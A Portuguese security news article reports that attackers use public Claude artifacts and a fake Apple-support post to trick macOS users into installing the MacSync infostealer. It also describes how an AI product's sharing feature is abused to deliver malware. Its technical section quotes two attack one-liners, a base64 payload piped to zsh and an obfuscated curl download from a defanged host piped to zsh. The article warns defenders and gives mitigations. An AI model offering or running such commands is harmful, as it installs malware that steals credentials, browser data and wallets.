Menu Fechar

Vetor de Ataque: Malware Infostealer Utiliza Artefatos do Claude

Malware Infostealer

Vetor de Ataque

Um novo vetor de ataque foi identificado, onde atores de ameaça estão utilizando artefatos do modelo de linguagem Claude para distribuir malware infostealer para usuários de macOS. Os atores de ameaça estão criando artefatos maliciosos no domínio claude.ai, que são acessíveis a qualquer pessoa via links. Esses artefatos contêm instruções maliciosas que, quando executadas, permitem a instalação de malware no sistema do usuário.

Os pesquisadores da MacPaw e da AdGuard descobriram que os resultados de busca maliciosos estão sendo exibidos para várias consultas, como “online DNS resolver”, “macOS CLI disk space analyzer” e “HomeBrew”. Esses resultados levam a um artefato público do Claude ou a um artigo no Medium que imita o suporte da Apple, onde o usuário é instruído a colar um comando de shell no Terminal.

Impacto

O impacto desse ataque é significativo, pois o malware infostealer pode exfiltrar informações sensíveis do sistema, incluindo dados de chaveiro, navegador e carteiras de criptomoedas. Além disso, o malware estabelece comunicação com a infraestrutura de comando e controle (C2) usando um token e uma chave API hardcoded, e spoofa um agente de usuário do navegador macOS para se misturar com a atividade normal.

Os pesquisadores descobriram que o malware carrega um carregador de malware para o infostealer MacSync, que exfiltra informações sensíveis presentes no sistema. O malware também cria um arquivo zip com as informações roubadas e as envia para a infraestrutura C2 do ator de ameaça.

Detalhes Técnicos

Os detalhes técnicos do ataque incluem:




  • Dois variantes do ataque foram observados, com comandos de shell diferentes:
    • `echo “…” | base64 -D | zsh`
    • `true && cur””l -SsLfk –compressed “https://raxelpak[.]com/curl/[hash]” | zsh`
  • O malware estabelece comunicação com a infraestrutura C2 usando um token e uma chave API hardcoded.
  • O malware spoofa um agente de usuário do navegador macOS para se misturar com a atividade normal.
  • O malware carrega um carregador de malware para o infostealer MacSync.
  • O malware cria um arquivo zip com as informações roubadas e as envia para a infraestrutura C2 do ator de ameaça.

Mitigação

Para mitigar esse ataque, os usuários devem:

  • Exercer cautela ao executar comandos no Terminal que não sejam completamente entendidos.
  • Perguntar ao chatbot sobre a segurança dos comandos fornecidos antes de executá-los.
  • Evitar clicar em links maliciosos ou acessar artefatos maliciosos.
  • Manter o sistema operacional e os aplicativos atualizados.
  • Utilizar um antivírus confiável e atualizado.

Fontes de Inteligência: bleepingcomputer.com. Curadoria e Insights: Redação Security.



Deixe um comentário

O seu endereço de email não será publicado. Campos obrigatórios marcados com *

Publicado emSegurança, Segurança da Informação